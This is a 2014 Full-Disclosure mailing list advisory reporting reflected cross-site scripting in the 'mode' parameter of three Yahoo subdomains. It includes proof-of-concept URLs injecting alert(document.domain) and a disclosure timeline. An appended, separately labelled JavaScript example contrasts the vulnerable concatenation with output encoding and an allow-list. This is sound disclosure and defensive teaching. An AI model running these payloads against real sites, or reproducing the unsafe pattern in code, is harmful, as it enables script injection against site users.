Message-ID: <531AF079.9080105@t-online.de>
Date: Sat, 08 Mar 2014 11:27:05 +0100
From: Stefan Schurtz <sschurtz@...nline.de>
To: full-disclosure@...ts.grok.org.uk
Subject: Yahoo Bug Bounty Program Vulnerability #4 #5 #6 Cross-site Scripting vulnerabilities
In Jan '14 I reported three Cross-site Scripting vulnerabilities to the
Yahoo Bug Bounty Program. And I know, it is really really hard, but ...
again ... no feedback or bounty :)
Advisory: Yahoo Bug Bounty Program Vulnerability #4 #5 #6 Cross-site Scripting vulnerabilities
Advisory ID: SSCHADV2014-YahooBB-004 / YahooBB-005 / YahooBB-006
Author: Stefan Schurtz
Affected Software: Successfully tested on celebrity.yahoo.com, movies.yahoo.com, music.yahoo.com
Vendor URL: http://yahoo.com/
Vendor Status: Not tested anymore
Bounty: nothing
==========================
Vulnerability Description
==========================
The 'mode' parameter on "https://celebrity.yahoo.com/",
"https://movies.yahoo.com/", "https://music.yahoo.com/" is prone to a
Cross-site Scripting vulnerability.
==========================
PoC-Exploit
==========================
http://celebrity.yahoo.com/video/george-clooney-responds-tina-fey-230813957.html?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
http://movies.yahoo.com/photos/star-wars-cast-rumors-1389647299-slideshow/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
http://music.yahoo.com/videos/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
==========================
Disclosure Timeline
==========================
20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program)
==========================
Credits
==========================
Vulnerabilities found and advisory written by Stefan Schurtz.
==========================
References
==========================
http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-004.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-005.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-006.txt
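Added example, not part of the original advisory and not Yahoo's code: the shape of the PoC value ("-alert(document.domain)-") suggests the 'mode' parameter was reflected inside a double-quoted JavaScript string, which is an assumption here. The sketch contrasts that pattern with context-aware output encoding and an allow-list; all function names and the allow-list values are hypothetical.

```javascript
// Added example. All names and the allow-list values are hypothetical.
// Assumption: ?mode= is copied into a double-quoted string in an inline script.
const PAGE_PAYLOAD = 'multipart"-alert(document.domain)-"'; // value from the PoC URLs
const ALLOWED_MODES = new Set(["multipart", "single"]);     // constructed allow-list

// Vulnerable pattern: raw concatenation into a JavaScript string literal.
function renderUnsafe(mode) {
  return 'var cfg = { mode: "' + mode + '" };';
}

// Encode a value as a JS string literal that is also safe inside <script>:
// JSON.stringify escapes quotes and backslashes; the replace covers characters
// that could end the script element or the line.
function jsString(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0")
  );
}

// Hardened pattern: context-aware output encoding.
function renderSafe(mode) {
  return "var cfg = { mode: " + jsString(mode) + " };";
}

// Input validation as a second layer: unknown modes are rejected (null).
function normalizeMode(mode) {
  return ALLOWED_MODES.has(mode) ? mode : null;
}

// Harness: run a generated script body with stubbed globals; true if alert() ran.
function alertFires(scriptBody) {
  let fired = false;
  const run = new Function("alert", "document", scriptBody);
  run(() => { fired = true; }, { domain: "example.test" });
  return fired;
}

console.log("unsafe executes injected call:", alertFires(renderUnsafe(PAGE_PAYLOAD)));
console.log("safe executes injected call:  ", alertFires(renderSafe(PAGE_PAYLOAD)));
console.log("safe output:", renderSafe("</script>"));
```

Encoding is what closes the hole; the allow-list only narrows what reaches the template.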